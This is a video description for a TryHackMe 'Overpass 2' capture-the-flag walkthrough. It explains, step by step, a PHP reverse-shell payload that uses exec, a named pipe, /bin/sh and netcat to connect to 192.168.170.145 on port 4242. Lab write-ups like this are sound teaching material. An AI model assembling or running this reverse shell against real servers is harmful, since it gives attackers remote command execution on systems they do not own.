Overpass 2 CTF | TryHackMe | Wireshark, Nmap & Cracking with John & Hashcat
VloĆŸit
- Äas pĆidĂĄn 28. 08. 2024
- Explore the 'Overpass 2' challenge on TryHackMe with me. Dive deep into network analysis with Wireshark, scan targets using Nmap, and crack secrets with John the Ripper and Hashcat. Plus, learn how to exploit SUID for elevated access. Perfect for enthusiasts eager to expand their cybersecurity toolkit. Subscribe for more expert walkthroughs!
Php payload:
Note that CZcams does not allow brackets in the descriptions
PHP exec function:
At the core of this code is the exec function. This is a PHP function that allows you to execute commands directly on the server. It's powerful, but it can also be risky if misused.
rm /tmp/f:
The first command rm /tmp/f is trying to remove a file named 'f' located in the '/tmp' directory. Essentially, it's cleaning up, ensuring there's no existing file with that name.
mkfifo /tmp/f:
Next, we have mkfifo /tmp/f. This command creates a named pipe, which is a way of inter-process communication. In simpler terms, it allows two processes to communicate with each other. Here, it's creating a named pipe called 'f' in the '/tmp' directory.
cat /tmp/f|/bin/sh -i 2đ»&1:
Moving on, cat /tmp/f|/bin/sh -i 2đ»&1 is a bit more complex. What's happening here is that it's reading data from our named pipe 'f' and passing it to a shell (/bin/sh). The -i flag ensures the shell is interactive, and 2đ»&1 is a bit of redirection magic, ensuring that both standard output and standard error are sent to the same place.
nc 192.168.170.145 4242:
Lastly, we have nc 192.168.170.145 4242. This is using the 'netcat' utility, often abbreviated as 'nc'. It's setting up a connection to the IP address 192.168.170.145 on port 4242. Essentially, it's trying to communicate with a remote machine.
Putting it all together:
When we piece it all together, this code is essentially setting up a reverse shell. It's trying to establish a connection from the server (where this PHP code is running) back to a remote machine on a specific IP and port. Once connected, the remote machine can send commands to be executed on the server. #ctf #tryhackme #cybersecurity #pentesting #privilegeescalation
1+ sub nice